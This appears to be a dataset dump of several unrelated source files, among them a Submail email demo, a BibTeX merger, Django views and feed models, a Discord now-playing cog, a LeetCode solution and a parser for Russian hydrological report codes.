SDK')\n\n'''\nRequired para\nset project sign\n'''\nsubmail.set_project('uigGk1')\n\n'''\nOptional para\nsubmail email text content filter\n@Multi-para\n'''\nsubmail.add_var('name','leo')\nsubmail.add_var('age','32')\n\n'''\nOptional para\nsubmail email link content filter\n@Multi-para\n'''\nsubmail.add_link('developer','http://submail.cn/chs/developer')\nsubmail.add_link('store','http://submail.cn/chs/store')\n\n'''\nOptional para\nemail headers\n@Multi-para\n'''\nsubmail.add_header('X-Accept','zh-cn')\nsubmail.add_header('X-Mailer','leo App')\nprint(submail.xsend())\n","sub_path":"smbackend/submail/mail_xsend_demo.py","file_name":"mail_xsend_demo.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"182651792","text":"import os\nimport bibtexparser as bp\nfrom bibtexparser.bparser import BibTexParser\nfrom bibtexparser.customization import convert_to_unicode\nfrom bibtexparser.bwriter import BibTexWriter\nfrom bibtexparser.bibdatabase import BibDatabase\n\nfrom pybtex.database.format import format_database\n\n\ndef gather_bibs(dir, export_file):\n    db = BibDatabase()\n    parser = BibTexParser()\n    parser.customization = convert_to_unicode\n    bibs = {}\n    for file in os.listdir('./' + dir):\n        if file.endswith('.bib'):\n            with open('./' + dir + '/' + file) as bib_file:\n                bib_data = bp.load(bib_file, parser=parser)\n                for entry in bib_data.entries:\n                    if entry['ID'] not in bibs:\n                        bibs[entry['ID']] = entry\n\n    for key in bibs:\n        db.entries.append(bibs[key])\n    writer = BibTexWriter()\n    with open('set/' + export_file, 'w') as bibfile:\n        bibfile.write(writer.write(db))\n\n\n# exception handling is currently ineffective and needs further work\n# for now, generating correct html requires all bib files to be valid\ndef export_html():\n    format_database('set/ai.bib', 'set/ai.md', 'bibtex', 'md')\n    format_database('set/iot.bib', 'set/iot.md', 'bibtex', 'md')\n    # all_bib = open('set/_index.en.md', 'w')\n    # all_bib.write('### Artificial Intelligence\\n')\n    # ai_bib = open('set/ai.md', 'r').read()\n    # iot_bib = open('set/iot.md', 'r').read()\n    # all_bib.write(ai_bib)\n    # all_bib.write('***\\n')\n    # all_bib.write('### Internet of Things\\n')\n    # all_bib.write(iot_bib)\n    os.remove('set/ai.bib')\n    # os.remove('set/ai.md')\n    os.remove('set/iot.bib')\n    # 
os.remove('set/iot.md')\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"46587998","text":"from services.example.services import CatalogService\nfrom services.wrapper import Wrapper\n\n\nclass Catalog(Wrapper):\n fields = (\"uuid\", \"url\", \"zaaktypen\")\n service = CatalogService\n\n def __init__(self, data):\n super().__init__(data)\n self.uuid = self.url.split(\"/\")[-1]\n","sub_path":"app/services/example/catalog/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"607891767","text":"\"\"\" QuArK - Quake Army Knife\r\n\r\nModel editor mouse handles.\r\n\"\"\"\r\n#\r\n# Copyright (C) 1996-99 Armin Rigo\r\n# THIS FILE IS PROTECTED BY THE GNU GENERAL PUBLIC LICENCE\r\n# FOUND IN FILE \"COPYING.TXT\"\r\n#\r\n\r\n\r\n#\r\n# See comments in maphandles.py.\r\n#\r\n\r\n\r\nimport quarkx\r\nimport math\r\nfrom qdictionnary import Strings\r\nimport qhandles\r\nfrom mdlutils import *\r\nimport mdlentities\r\n\r\n\r\n\r\nvertexdotcolor = 0\r\n\r\n\r\n\r\n#\r\n# The handle classes.\r\n#\r\n\r\nclass CenterHandle(qhandles.CenterHandle):\r\n \"Like qhandles.CenterHandle, but specifically for the Model editor.\"\r\n def menu(self, editor, view):\r\n return mdlentities.CallManager(\"menu\", self.centerof, editor) + self.OriginItems(editor, view)\r\n\r\nclass IconHandle(qhandles.IconHandle):\r\n \"Like qhandles.IconHandle, but specifically for the Model editor.\"\r\n def menu(self, editor, view):\r\n return mdlentities.CallManager(\"menu\", self.centerof, editor) + self.OriginItems(editor, view)\r\n\r\n\r\nclass MdlEyeDirection(qhandles.EyeDirection):\r\n\r\n MODE = SS_MODEL\r\n\r\n\r\n\r\nclass VertexHandle(qhandles.GenericHandle):\r\n \"Frame Vertex handle.\"\r\n\r\n size = (3,3)\r\n\r\n def draw(self, view, cv, draghandle=None):\r\n p = view.proj(self.pos)\r\n if p.visible:\r\n cv.setpixel(p.x, p.y, vertexdotcolor)\r\n\r\n\r\n#\r\n# Functions to build common lists of handles.\r\n#\r\n\r\n\r\ndef BuildCommonHandles(editor, ex):\r\n \"Build a list of handles to display on all map views.\"\r\n\r\n fs = ex.uniquesel\r\n if (fs is None) or editor.linearbox:\r\n return []\r\n else:\r\n #\r\n # Get the list of handles from the entity manager.\r\n #\r\n return mdlentities.CallManager(\"handlesopt\", fs, editor)\r\n\r\n\r\n\r\ndef BuildHandles(editor, ex, view):\r\n \"Build a list of handles to display on one map view.\"\r\n\r\n fs = ex.uniquesel\r\n if (fs is None) or editor.linearbox:\r\n #\r\n # Display a linear mapping box.\r\n #\r\n list = ex.sellist\r\n box = quarkx.boundingboxof(list)\r\n if box is None:\r\n h = []\r\n else:\r\n manager = qhandles.LinHandlesManager(MapColor(\"Linear\"), box, list)\r\n h = manager.BuildHandles(editor.interestingpoint())\r\n h = qhandles.FilterHandles(h, SS_MODEL)\r\n else:\r\n #\r\n # Get the list of handles from the entity manager.\r\n #\r\n h = mdlentities.CallManager(\"handles\", fs, editor, view)\r\n #\r\n # The 3D view \"eyes\".\r\n #\r\n for v in editor.layout.views:\r\n if (v is not view) and (v.info[\"type\"] == \"3D\"):\r\n h.append(qhandles.EyePosition(view, v))\r\n h.append(MdlEyeDirection(view, v))\r\n return qhandles.FilterHandles(h, SS_MODEL)\r\n\r\n\r\n\r\n#\r\n# Drag Objects\r\n#\r\n\r\nclass RectSelDragObject(qhandles.RectangleDragObject):\r\n \"A red rectangle that selects the 
polyhedrons it touches.\"\r\n\r\n def rectanglesel(self, editor, x,y, rectangle):\r\n if not (\"T\" in self.todo):\r\n editor.layout.explorer.uniquesel = None\r\n polylist = editor.Root.findallsubitems(\"\", \":p\")\r\n lastsel = None\r\n for p in polylist:\r\n if rectangle.intersects(p):\r\n p.selected = 1\r\n lastsel = p\r\n if lastsel is not None:\r\n editor.layout.explorer.focus = lastsel\r\n editor.layout.explorer.selchanged()\r\n\r\n\r\n#\r\n# Mouse Clicking and Dragging on map views.\r\n#\r\n\r\ndef MouseDragging(self, view, x, y, s, handle):\r\n \"Mouse Drag on a Model View.\"\r\n\r\n #\r\n # qhandles.MouseDragging builds the DragObject.\r\n #\r\n\r\n if handle is not None:\r\n s = handle.click(self)\r\n if s and (\"S\" in s):\r\n self.layout.actionmpp() # update the multi-pages-panel\r\n\r\n return qhandles.MouseDragging(self, view, x, y, s, handle, MapColor(\"GrayImage\", SS_MODEL))\r\n\r\n\r\ndef MouseClicked(self, view, x, y, s, handle):\r\n \"Mouse Click on a Model view.\"\r\n\r\n #\r\n # qhandles.MouseClicked manages the click but doesn't actually select anything\r\n #\r\n\r\n flags = qhandles.MouseClicked(self, view, x, y, s, handle)\r\n\r\n if \"1\" in flags:\r\n\r\n #\r\n # This mouse click must select something.\r\n #\r\n\r\n self.layout.setupdepth(view)\r\n choice = view.clicktarget(self.Root, x, y)\r\n # this is the list of frame triangles we clicked on\r\n if len(choice):\r\n choice.sort() # list of (clickpoint,component,triangleindex) tuples - sort by depth\r\n clickpoint, obj, tridx = choice[0]\r\n if (obj.type != ':mc') or (type(tridx) is not type(0)): # should not occur\r\n return flags\r\n if (\"M\" in s) and obj.selected: # if Menu, we try to keep the currently selected objects\r\n return flags\r\n # if \"T\" in s: # if Multiple selection request\r\n # obj.togglesel()\r\n # if obj.selected:\r\n # self.layout.explorer.focus = obj\r\n # self.layout.explorer.selchanged()\r\n # else:\r\n # ...\r\n # self.layout.explorer.uniquesel = obj\r\n else:\r\n if not (\"T\" in s): # clear current selection\r\n self.layout.explorer.uniquesel = None\r\n return flags+\"S\"\r\n return flags\r\n\r\n","sub_path":"runtime/tags/qk511b-opengl-update-merged/quarkpy/mdlhandles.py","file_name":"mdlhandles.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"236948145","text":"from discord.ext import commands\nimport asyncio\nimport dbus\nimport time\n\nfrom .lib import utils\n\n\ndef setup(bot):\n bot.add_cog(Music(bot))\n\n\nclass Music(object):\n def __init__(self, bot):\n self.bot = bot\n self.config = bot.config\n\n self.nowplaying_enabled = False\n self.nowplaying_user = None\n self.time_since_update = 0\n self.bot.loop.create_task(self.nowplaying_updater())\n self.dbus_if = None\n self.session_bus = None\n\n @commands.command(pass_context=True, aliases=['np'])\n async def nowplaying(self, ctx):\n member = ctx.message.author\n\n if self.nowplaying_enabled:\n await utils.set_game(self.bot, member, '...')\n self.nowplaying_user = None\n else:\n self.nowplaying_user = member\n\n self.nowplaying_enabled = not self.nowplaying_enabled\n\n async def nowplaying_updater(self):\n \"\"\"\n Updates the currently playing track if needed.\n The updater is limited to 1 update every 60 seconds.\n \"\"\"\n\n timestamp = 0\n\n while True:\n if not self.nowplaying_enabled:\n await asyncio.sleep(5)\n continue\n\n user = self.nowplaying_user\n\n await self.connect_dbus()\n\n game = str(await 
utils.get_game(user)).strip('♪ ')\n            playing = self.get_playing()\n            time_now = int(time.time())\n\n            if (not playing == game) and (time_now - timestamp > 60):\n                await utils.set_game(self.bot, user, f'♪ {playing} ♪')\n                timestamp = int(time.time())\n\n            await asyncio.sleep(5)\n\n    async def connect_dbus(self, *, player='cantata'):\n        \"\"\"\n        Connect to the media player if it is available.\n        Tries to reconnect after 60 seconds if the connection fails.\n        \"\"\"\n\n        if self.dbus_if is not None:\n            return\n\n        bus_name = f'org.mpris.MediaPlayer2.{player}'\n        object_path = '/org/mpris/MediaPlayer2'\n        dbus_interface = 'org.freedesktop.DBus.Properties'\n\n        while True:\n            try:\n                self.session_bus = dbus.SessionBus()\n                proxy = self.session_bus.get_object(bus_name, object_path)\n                self.dbus_if = dbus.Interface(proxy, dbus_interface)\n                print('DBus connection successful.')\n                break\n            except dbus.exceptions.DBusException as e:\n                print('DBus connection failed, retrying in 60 seconds.')\n                await asyncio.sleep(60)\n\n    def player_info(self, property):\n        return self.dbus_if.Get('org.mpris.MediaPlayer2.Player', property)\n\n    def is_playing(self):\n        status = self.player_info('PlaybackStatus')\n        return True if str(status) == 'Playing' else False\n\n    def get_playing(self):\n        try:\n            if self.is_playing():\n                mdata = self.player_info('Metadata')\n                title = str(mdata['xesam:title'])\n                artist = str(list(mdata['xesam:artist'])[0])\n\n                return f'{artist} - {title}'\n            else:\n                return '▮▮'\n        except dbus.exceptions.DBusException:\n            self.dbus_if = None\n            return '...'\n","sub_path":"selfbot/plugins/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"259347724","text":"# https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/\n\"\"\"\nRecursively pass each subtree's preorder and inorder arrays back into the constructor to build the left and right subtrees.\n\nThe first value of preorder is always the root's value, and the second is always root.left.val.\nSince the binary tree contains no duplicate values, the position of preorder[0] (root.val) in the inorder array splits it:\nthe part to its left is root.left's inorder and the part to its right is root.right's inorder.\nThat fixes the inorder arrays and lengths of both subtrees, and those lengths then determine\nthe corresponding preorder slices for root.left and root.right.\nRecurse with the constructor on each pair of slices.\n\"\"\"\nclass Solution:\n    def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n        if len(preorder) == 0:\n            return\n        root = TreeNode(preorder[0])\n        root_pos_inorder = inorder.index(root.val)\n        \n        left_inorder = inorder[0 : root_pos_inorder]\n        right_inorder = inorder[root_pos_inorder + 1 :]\n        \n        left_preorder = preorder[1 : len(left_inorder) + 1]\n        right_preorder = preorder[len(left_inorder) + 1 :]\n        \n        left = self.buildTree(left_preorder, left_inorder)\n        right = self.buildTree(right_preorder, right_inorder)\n        root.left = left\n        root.right = right\n        return root","sub_path":"most_interviewed/trees/construct_binary_tree_from_preorder_and_inorder_traversal.py","file_name":"construct_binary_tree_from_preorder_and_inorder_traversal.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"245969740","text":"#Program takes headers of news from the website\n#need to install bs4 and requests packages\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef headersList():\n    url = 'http://www.interia.pl' #need some url address\n    r = requests.get(url)\n    source = BeautifulSoup(r.text, features =\"html.parser\")\n\n    for header in source.find_all(class_=\"news-li\"): 
#name of class in html code of our website\n if header.a: #if header is a link\n print(header.a.text.replace(\"\\n\", \" \").strip())\n else:\n print(header.contents[0].strip())\n\n#Headers number\ndef headersTable():\n url = 'http://www.interia.pl/'\n titles = []\n\n url = requests.get(url)\n soup = BeautifulSoup(url.text, features=\"html.parser\")\n title = soup.findAll('li', {'class': 'news-li'})\n for row in title:\n titles.append(row.text.replace(\"\\n\", \" \").strip())\n print('There are',len(titles),'headers.')\n\nprint('List of headers')\nheadersList()\nheadersTable()\n","sub_path":"headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"629317964","text":"from django.views import generic\nfrom django.utils import timezone\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q\nfrom .models import Result\nfrom fixtures.models import Category\nfrom phx.helpers.subnav import generate_subnav\nfrom pages.models import Page\n\n\nclass ResultsListView(generic.ListView):\n model = Result\n paginate_by = 10\n\n def get_context_data(self, **kwargs):\n context = super(ResultsListView, self).get_context_data(**kwargs)\n context['breadcrumb'] = self.generate_breadcrumb()\n page = get_object_or_404(Page, slug=self.request.path)\n context['page'] = page\n context['page_title'] = page.title\n context['categories'] = Category.objects.all()\n context['search'] = self.request.GET.get('search', '')\n context['category'] = self.request.GET.get('category', '')\n context['subnav'] = generate_subnav(self.request.path, context['page'])\n return context\n\n def get_queryset(self):\n query = Result.objects.prefetch_related(\n 'fixture__categories'\n ).select_related('fixture').filter(\n fixture__event_date__lte=timezone.now(),\n ).order_by('-fixture__event_date').distinct()\n\n search = self.request.GET.get('search')\n if search:\n query = query.filter(\n Q(summary__icontains=search) |\n Q(results__icontains=search) |\n Q(fixture__title__icontains=search) |\n Q(fixture__location__icontains=search) |\n Q(fixture__categories__abbreviation__icontains=search) |\n Q(fixture__categories__title__icontains=search)\n )\n\n category = self.request.GET.get('category')\n if category:\n query = query.filter(fixture__categories__abbreviation=category)\n\n return query\n\n def generate_breadcrumb(self):\n return [\n {\n 'title': 'Home',\n 'linkUrl': '/',\n },\n {\n 'title': 'Results',\n }\n ]\n","sub_path":"phx/results/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"295124831","text":"#!/usr/bin/env python\n# tiempo\nimport os\nimport sys\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\",\"OmegaServiceDesk.settings\")\nimport locale, dialog\nfrom dialog import Dialog\nfrom core.models import *\nfrom modules.OmegaConfiguration.models import *\nimport datetime\ndias = {\"0\":\"Domingo\",\"1\":\"Lunes\",\"2\":\"Martes\",\"3\":\"Miercoles\",\"4\":\"Jueves\",\"5\":\"Viernes\",\"6\":\"Sabado\"}\nlocale.setlocale(locale.LC_ALL,'')\nd = Dialog(dialog=\"dialog\")\nd.set_background_title(\"Calendar Program\")\nd.msgbox(\"Bienvenido\")\nstatus,minutos = d.inputbox(\"minutos:\",backtitle=\"Calendar Program\")\nminutos = int(minutos)\ncalendars = list()\nfor i in OC_Calendar.objects.all():\n calendars.append((str(i.id),\"%s - 
%s\"%(i.name,i.description),False))\nstatus,tag = d.radiolist(\"\",choices=calendars,title=\"seleccione un calendario\",backtitle=\"Calendar Program\")\ncalendar = OC_Calendar.objects.get(pk=int(tag))\nhoy = datetime.datetime.today()\nregistro = datetime.datetime.today()\nferiados = []\nc = 0\nif not len(calendar.oc_calendarday_set.all()) > 0:\n    d.msgbox(\"no ha creado ningun horario en ese calendario!!!\")\nelse:\n    while not minutos == 0:\n        \n        horario = calendar.oc_calendarday_set.all().filter(day__name = dias.get(hoy.strftime(\"%w\"))).order_by('init_time')\n        if horario and hoy.date() not in feriados:\n            if c > 0:\n                hoy = datetime.datetime(hoy.year,hoy.month,hoy.day,int(horario[0].init_time.strftime(\"%H\")),int(horario[0].init_time.strftime(\"%M\")))\n            for i in horario:\n                if minutos == 0:\n                    continue\n                else:\n                    if c > 0 and datetime.time(int(hoy.strftime('%H')),int(hoy.strftime('%M'))) <= i.init_time:\n                        hoy = datetime.datetime(hoy.year,hoy.month,hoy.day,int(i.init_time.strftime(\"%H\")),int(i.init_time.strftime(\"%M\")))\n                    while datetime.time(int(hoy.strftime('%H')),int(hoy.strftime('%M'))) >= i.init_time and datetime.time(int(hoy.strftime('%H')),int(hoy.strftime('%M'))) <= i.finish_time and not minutos == 0:\n                        hoy = hoy + datetime.timedelta(minutes = 1)\n                        minutos = minutos - 1\n        c = c + 1\n        if minutos > 0 and c > 0:\n            hoy = hoy + datetime.timedelta(days = 1)\nd.msgbox(\"dia:%s\\n%s\\n\\n\\ndia:%s\\n%s\"%(str(dias.get(registro.strftime('%w'))),str(registro),str(dias.get(hoy.strftime('%w'))),str(hoy)))\n","sub_path":"tiempo.py","file_name":"tiempo.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"80397896","text":"\nimport os, os.path\n#from os.path import splitext, basename, join\nimport json\nimport csv\nimport numpy as np\nfrom itertools import combinations\n\n\ndef down_load_file(photo_link, path_down_load_file):\n    import io\n    import os\n\n    try:\n        from urllib.request import urlretrieve  # Python 3\n        from urllib.error import HTTPError,ContentTooShortError\n    except ImportError:\n        from urllib import urlretrieve  # Python 2\n\n\n\n    try:\n        from urllib.parse import urlparse  # Python 3\n    except ImportError:\n        from urlparse import urlparse  # Python 2\n    from os.path import splitext, basename, join\n    picture_page = photo_link\n    disassembled = urlparse(picture_page)\n    filename, file_ext = splitext(basename(disassembled.path))\n    filename = filename + file_ext\n    fullfilename = os.path.join(path_down_load_file, filename)\n\n\n    #download\n    try:\n        urlretrieve(photo_link, fullfilename)\n\n    except HTTPError as err:\n        print(err.code)\n    except ContentTooShortError as err:\n        # retry once\n        try:\n            urlretrieve(photo_link, fullfilename)\n        except ContentTooShortError as err:\n            print(err)\n    return fullfilename\n#================================== Create predict ===============================================\n#[0 'label',1 'label_count',2 'percent_label',3 'previous_p_label',4 'previous_next_label',5'sum_p_label',\n#6 'image_count',7 'percent_image',8 'previous_p_image',9 'previous_next_image',10 'sum_p_label',11 'number_edge']\ndef label_bigger_percent(percent, list_in):\n    list_bigger = []\n    for label in list_in:\n        if label[5] <= percent:\n            list_bigger.append(label[0])\n    return list_bigger\n\ndef label_relationship_bigger_percent(list_bigger, lable_unique, arr_relationship, number_relationship):\n    # iterate over all labels\n    label_relationship = []\n    for label in lable_unique:\n        # if the label is not in the over-
percent list\n        if label not in list_bigger:\n            # Get index\n            i = lable_unique.index(label)\n            # scan the row at that index\n            for j in range(len(lable_unique)):\n                # if there is a relationship\n                if number_relationship != -1:\n                    if int(arr_relationship[i][j]) >= number_relationship:\n                        # check whether the related label is in the over-percent label list\n                        if lable_unique[j] in list_bigger:\n                            label_relationship.append(label)\n                            break\n    return label_relationship\n\ndef read_list_percent_and_array_relationship(path_percent, path_relationship):\n    list_percent = []\n    lable_unique = []\n    with open (path_percent, 'r') as csvfile:\n        reader=csv.reader(csvfile)\n        for i, row in enumerate(reader):\n            list_percent.append([row[0], int(row[1]), row[2], row[3], row[4], float(row[5]), row[6],\n                                 row[7], row[8], row[9], float(row[10]), row[11]])\n            lable_unique.append(row[0])\n\n    size = len(list_percent)\n    arr_relationship = np.zeros((size, size), dtype=np.int)\n    with open (path_relationship, 'r') as csvfile:\n        reader=csv.reader(csvfile)\n        for i, row in enumerate(reader):\n            for j, value in enumerate(row):\n                arr_relationship[i][j] = int(value)\n    return (list_percent, arr_relationship, lable_unique)\n\n\ndef create_dataset_predict(path_percent, path_relationship, percent, number_relationship):\n    if os.path.exists(path_percent) and os.path.exists(path_relationship):\n        list_percent, arr_relationship, lable_unique = read_list_percent_and_array_relationship(path_percent, path_relationship)\n        # get the set of labels within percent %\n        list_bigger = label_bigger_percent(percent, list_percent)\n        # get the set of labels related to the percent % set\n        label_relationship = label_relationship_bigger_percent(list_bigger, lable_unique, arr_relationship, number_relationship)\n        return (list_bigger, label_relationship)\n\n\n#==================================== Predict for each json ============================================\ndef check(list_label, list_bigger, label_relationship):\n    if list_label == []:\n        return False\n    flag = True\n    for label in list_label:\n        if label not in list_bigger:\n            if label not in label_relationship:\n                flag = False\n                break\n    return flag\n\ndef check_percent(list_label, list_bigger, label_relationship, percent_face):\n    #from itertools import combinations\n    list_new_list_label = []\n    num_remain = int(float(len(list_label) * percent_face / 100))\n    list_new_list_label = list(combinations(list_label, num_remain))\n    for label in list_new_list_label:\n        label = list(label)\n        flag = check(label, list_bigger, label_relationship)\n        if flag == True:\n            return True\n    return False\n\ndef check_ver2(list_label, list_bigger, label_relationship):\n    if list_label == []:\n        return (0, [])\n    num_labels_true = 0\n    #flag = True\n    list_label_true = []\n    for label in list_label:\n        if (label in list_bigger) or (label in label_relationship):\n            num_labels_true += 1\n            list_label_true.append(label)\n    percent_true = num_labels_true * 100.0 / len(list_label)\n    return (percent_true, list_label_true)\n\ndef check_percent_ver2(list_label, list_bigger, label_relationship, percent_face):\n#from itertools import combinations\n    list_new_list_label = [] \n    max_percent_true = 0 \n    flag_finally = False\n    # ================ Predict image true or false ================\n    num_remain = int(float(len(list_label) * percent_face / 100))\n    list_new_list_label = list(combinations(list_label, num_remain))\n    for label in list_new_list_label:\n        label = list(label)\n        flag = check(label, list_bigger, label_relationship)\n        if flag == True:\n            flag_finally = True\n\n    # =============== Check percent True of an image 
==============\n    percent_true, list_label_true = check_ver2(list_label, list_bigger, label_relationship)\n    \n    print (percent_true)\n    print (flag_finally)\n    return (percent_true, list_label_true, flag_finally)\n","sub_path":"label_visualize/run_flow/predict_ads_fb/compare_label.py","file_name":"compare_label.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"144866574","text":"from django.db import models\nfrom django.contrib.syndication.views import Feed\nfrom django.urls import reverse\nfrom decouple import config\nimport feedparser\n\n\nclass Channel(models.Model):\n    title = models.CharField(max_length=255, blank=True,\n                             null=True,)\n    description = models.TextField(blank=True,\n                                   null=True,)\n    link = models.URLField(blank=True,\n                           null=True,)\n    href = models.URLField()\n    published = models.DateTimeField(blank=True,\n                                     null=True,)\n    updated = models.DateTimeField(blank=True,\n                                   null=True,)\n\n    def save(self, *args, **kwargs):\n        if not self.title:\n            print(self.href)\n            feed = feedparser.parse(self.href)\n            print(feed)\n            feed_title = feed['channel']['title']\n            print(feed_title)\n            self.title = feed_title\n        super(Channel, self).save(*args, **kwargs)\n\n    def __str__(self):\n        return self.title\n\n\nclass Item(models.Model):\n    guid = models.CharField(max_length=255, primary_key=True)\n    title = models.CharField(max_length=255, blank=True, null=True)\n    summary = models.CharField(max_length=255, blank=True, null=True)\n    link = models.URLField(blank=True, null=True)\n    description = models.TextField(blank=True,\n                                   null=True,)\n    published = models.DateTimeField(null=True)\n    updated = models.DateTimeField(null=True)\n    channel = models.ForeignKey(Channel, on_delete=models.CASCADE, null=True)\n    enclosure_url = models.URLField(blank=True, null=True)\n    enclosure_length = models.IntegerField(default=0)\n    enclosure_type = models.CharField(max_length=255, blank=True, null=True)\n\n    def __str__(self):\n        if self.title:\n            return self.title\n        else:\n            return self.guid\n\n\nclass LatestEntriesFeed(Feed):\n    title = config('FEED_TITLE', default='')\n    link = \"/sitenews/\"\n    description = config('FEED_DESCRIPTION', default='')\n\n    def items(self):\n        return Item.objects.order_by('-published')\n\n    def item_title(self, item):\n        return item.title\n\n    def item_description(self, item):\n        return item.description\n\n    def item_enclosure_url(self, item):\n        return item.enclosure_url\n\n    # def item_enclosure_length(self, item):\n    #     \"\"\"\n    #     Takes an item, as returned by items(), and returns the item's\n    #     enclosure length.\n    #     \"\"\"\n    #     return item.audio_length\n\n    def item_enclosure_mime_type(self, item):\n        \"\"\"\n        Takes an item, as returned by items(), and returns the item's\n        enclosure MIME type.\n        \"\"\"\n        return \"audio/mpeg\"\n\n    def item_pubdate(self, item):\n        \"\"\"\n        Takes an item, as returned by items(), and returns the item's\n        pubdate.\n        \"\"\"\n        return item.published\n\n    def item_guid(self, obj):\n        \"\"\"\n        Takes an item, as return by items(), and returns the item's ID.\n        \"\"\"\n        return obj.guid\n\n    # item_link is only needed if Item has no get_absolute_url method.\n    def item_link(self, item):\n        # return reverse('news-item', args=[item.pk])\n        return '/items/' + item.pk\n","sub_path":"feeds/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"47017260","text":"import re\nimport click\n\nreport_bounds = 
re.compile(r'^(.*?)=', re.DOTALL | re.MULTILINE)\n\nidentifier = r'(?P<basin>\\d{2})(?P<station_id>\\d{3})'\nmeasure_time = r'(?P<YY>\\d{2})(?P<GG>\\d{2})(?P<n>[1-5,7])'\nstage = r'1(?P<stage>\\d{4}|/{4})'\nchange_stage = r'2(?P<change_stage>\\d{3}|/{3})(?P<change_stage_sign>\\d|/)'\nprevious_stage = r'3(?P<prev_stage>\\d{4}|/{4})'\ntemperature = r'4(?P<water_temp>\\d{2})(?P<air_temp>\\d{2}|/{2})'\nice = r'5(?P<ice>\\d{4})'\nwater_condition = r'6(?P<water_condition>\\d{4})'\nice_thickness = r'7(?P<ice_thickness>\\d{3})(?P<snow_depth>\\d)'\ndischarge = r'8(?P<discharge_integer_part>\\d)(?P<discharge>\\d{3})'\nprecipitation = r'0(?P<precip_amount>\\d{3}|/{2})(?P<precip_duration>\\d|/{2})'\n\nstandart_observation = f'(\\s{stage})?(\\s{change_stage})?(\\s{previous_stage})?(\\s{temperature})?(\\s{ice})*(\\s{water_condition})?(\\s{ice_thickness})?(\\s{discharge})?(\\s{precipitation})?'\n\nreport_pattern = f'^{measure_time}{standart_observation}'\n\n# print(report_pattern)\n\nadditional_sections_tags = r'9[22|33|44|55|66|77|88]\\d{2}'\n\nprevious_days = r'922(\\d{2})'\nflow = r'933(\\d{2})(\\s.*)'\npool_stage = r'944(\\d{2})(\\s.*)'\npool_flow = r'955(\\d{2})(\\s.*)'\nflow_detail = r'966(\\d{2})(\\s.*)'\ndisasters = r'97701(\\s.*)97702(\\s.*)97703(\\s.*)97704(\\s.*)97705(\\s.*)97706(\\s.*)97707(\\s.*)'\n\nNullValue = 'NIL'\n\n\nsnow_depth_scale = [\n \"На льду снега нет\",\n \"менее 5 см\",\n \"5-10 см\",\n \"11-15 см\",\n \"16-20 см\",\n \"21-25 см\",\n \"26-35 см\",\n \"36-50 см\",\n \"51-70 см\",\n \"больше 70 см\"\n]\n\nprecipitation_duration_scale = [\n \"менее 1 ч\",\n \"от 1 до 3 ч\",\n \"от 3 до 6 ч\",\n \"от 6 до 12 ч\",\n \"более 12 ч\"\n]\n\nice_conditions = [\n 'Сало',\n 'Снежура',\n 'Забереги (первичные; наносные); припай шириной менее 100 м - для озер,водохранилищ',\n 'Припай шириной более 100 м - для озер, водохранилищ',\n 'Забереги нависшие',\n '*Ледоход; для озер, водохранилищ - дрейф льда; снегоход - для пересыхающих рек',\n '*Ледоход, лед из притока, озера, водохранилища',\n '*Ледоход поверх ледяного покрова',\n '*Шугоход',\n 'Внутриводный лед (донный; глубинный)',\n 'Пятры',\n 'Осевший лед (на береговой отмели после понижения уровня)',\n 'Навалы льда на берегах (ледяные валы)',\n 'Ледяная перемычка в створе поста',\n 'Ледяная перемычка выше поста',\n 'Ледяная перемычка ниже поста',\n 'Затор льда выше поста',\n 'Затор льда ниже поста',\n 'Затор льда искусственно разрушается',\n 'Зажор льда выше поста',\n 'Зажор льда ниже поста',\n 'Зажор льда искусственно разрушается',\n 'Вода на льду',\n 'Вода течет поверх льда (после промерзания реки; при наличии воды подо льдом)',\n '*Закраины',\n 'Лед потемнел',\n 'Снежница',\n 'Лед подняло (вспучило)',\n 'Подвижка льда',\n 'Разводья',\n 'Лед тает на месте',\n '*Забереги остаточные',\n 'Наслуд',\n '*Битый лед - для озер, водохранилищ, устьевых участков рек',\n '*Блинчатый лед - для озер, водохранилищ, устьевых участков рек',\n '*Ледяные поля - для озер, водохранилищ, устьевых участков рек',\n '*Ледяная каша - для озер, водохранилищ, устьевых участков рек',\n 'Стамуха',\n 'Лед относит (отнесло) от берега - для озер, водохранилищ',\n 'Лед прижимает (прижало) к берегу - для озер, водохранилищ',\n '*Ледостав неполный',\n '*Ледяной покров с полыньями (промоинами, пропаринами)',\n 'Ледостав, ровный ледяной покров',\n 'Ледостав, ледяной покров с торосами',\n 'Ледяной покров с грядами торосов - для водохранилищ',\n 'Шуговая дорожка',\n 'Подо льдом шуга',\n 'Трещины в ледяном покрове',\n 'Наледь',\n 'Лед нависший(ледяной мост)',\n 'Лед ярусный 
